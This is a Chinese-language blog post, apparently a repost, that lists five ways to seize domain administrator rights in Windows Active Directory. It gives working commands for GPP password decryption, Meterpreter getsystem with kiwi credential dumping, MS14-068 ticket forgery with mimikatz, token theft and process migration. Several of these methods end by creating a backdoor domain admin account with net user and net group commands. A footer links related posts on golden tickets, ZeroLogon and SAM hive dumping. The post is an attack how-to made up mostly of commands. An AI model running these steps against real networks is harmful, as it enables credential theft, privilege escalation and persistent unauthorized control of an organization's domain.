获取域管理员权限的几种方式

VSole2021-11-22 07:29:48

在不考虑直接攻击域控的情况下,如何快速获取域管理员权限呢?

在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、进程或是身份验证令牌,从而获取域管理员权限。本文分享几种常见的获取域管理员权限的方式。


第1种方式:利用GPP漏洞获取域管理权限

SYSVOL是域内的共享文件夹,用来存放登录脚本、组策略脚本等信息。当域管理员通过组策略修改密码时,在脚本中引入用户密码,就可能导致安全问题。

(1)访问SYSVOL共享文件夹,搜索包含“cpassword”的XML文件,获取AES加密的密码。

(2)使用kali自带的gpp-decrypt进行破解,从而获取域账号密码,直接登录域管理员账号获取访问权限。

2种方式:获取服务器明文登录密码

使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。提到system有两个方法,一是当前的权限是administrator用户,二是利用其它手段先提权到administrator用户。然后administrator用户可以直接getsystem到system权限。

meterpreter > getuidServer username: BYPASS-E97BA3FC\Administratormeterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > getuidServer username: NT AUTHORITY\SYSTEM

加载kiwi模块

load kiwi

列举系统中的明文密码

creds_all

第3种方式:使用MS14-068漏洞进行提权

MS14068是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。

攻击流程:

第一步:利用MS14-068伪造生成TGT

MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d  dc.test.com

第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书

mimiktz#kerberos::ptc TGT_bypass@test.com.ccache

第三步:获取域管理员权限。创建一个 test 账号并加入域管理员组,从而随时可以登录域控主机进行操作。

PsExec.exe \\dc cmd.exe
// 添加test用户net user test abc123! /add /domain// 把 test 用户添加进域管理员组net group "domain admins"  test /add /domain// 查看域管理员net group "domain admins" /domain 

第4种方式:窃取域管理员令牌

当有域控账户登陆至服务器时可使用令牌模拟进行渗透取得域控权限。

1、入侵域管理员所在的服务器,窃取域管理员的令牌,从而控制整个域。

2、直接在meterpreter shell上执行添加域管理员

add_user test abc123! -h 域控的IP地址add_group_user "Domain Admins" test -h 域控IP地址

第5种方式:进程迁移

入侵了域管理员所登录的服务器,将进程迁移到域管理员所运行的进程,就可以获得域管理员权限。

1、获取域管理员列表

net group "Domain Admins" /domain

2、利用ps找到域管理员(TEST\bypass)所运行的进程,然后将shell进程迁移到域管理员所运行的进程中,成功后就获得了域管理员权限。如下图所示:

3、输入shell命令获取OS shell,在本机上使用Windows命令添加新的域管理员:

// 添加test用户net user test admin@123 /add /domain// 把 test 用户添加进域管理员组net group "domain admins"  test /add /domain

4、成功添加了域管理员账号test。

testdomain
本作品采用《CC 协议》,转载必须注明作者和本文链接
攻击者在获取到域控权限后,可以利用约束委派或者基于资源的约束委派实现后门,以实现达到维持权限的目的。基于AD Event日志监视对特定 Active Directory 属性的修改,从而发现可疑的域委派后门。设置约束委派setspn -U -A cifs/test test
萌新如何玩转mimikatz
2022-08-29 06:48:46
暑假快到了,身边好多师傅都开启了"卷王"模式,而我也在南城师傅的帮助下开始了内网这个新征程;mimikatz就是我遇见的一个坎,我希望记录下这个过程,尽可能的帮助大家更快的掌握mimikatz的用法和技巧。最后,再次谢谢南城师傅对本文的指导与帮助!!
SharpSpray这是一个域内的密码喷射评估工具,能通过ldap收集用户名,并根据密码设置策略进行自动域内的密码喷射评估。SharpSpray是对SharpHose项目进行改造实现的,解决了原项目中无法在域外爆破、无法进行批量密码爆破等问题,并内置了三个域内高频率口令。
原理黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。第四步主要是来验证客户端的身份。所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。
记一次常规的域渗透
2023-03-30 09:48:11
@#45""okkkkkkkkkk,尝试登录:发现卡巴斯基和edr,直接关闭:私密马赛,我没能关掉,尝试通过导出密码拿下高用户的权限:reg save hklm\sam sam.hivereg save hklm\system system.hive本地secertdump解密这里我是从远程桌面托文件下来所以很卡,只选择下载了两个文件,security可以选择不下载:python secretsdump.py -system system.hive?
内网渗透 域ACL攻防
2022-07-20 10:44:00
用户认证授权成功后,Authing会签发Access Token给应用。ACE有许多不同类型,但是在Active Directory的权限中,只有四种不同的含义,两种分别用于授权和拒绝权限。
CVE-2020-1472攻击过程
2021-12-17 16:42:22
在去年9月份,国外披露了CVE-2020-1472(又被叫做ZeroLogon)的漏洞详情,网上也随即公开了Exp。 是近几年windows上比较重量级别的一个漏洞。通过该漏洞,攻击者只需能够访问域控的445端口,在无需任何凭据的情况下能拿到域管的权限。 该漏洞的产生来源于Netlogon协议认证的加密模块存在缺陷,导致攻击者可以在没有凭证的情况情况下通过认证。该漏洞的最稳定利用是调用netl
在大多数情况下,攻击者可以通过定位域管理员所登录的服务器,利用漏洞获取服务器system权限,找到域管理的账号、进程或是身份验证令牌,从而获取域管理员权限。
VSole
网络安全专家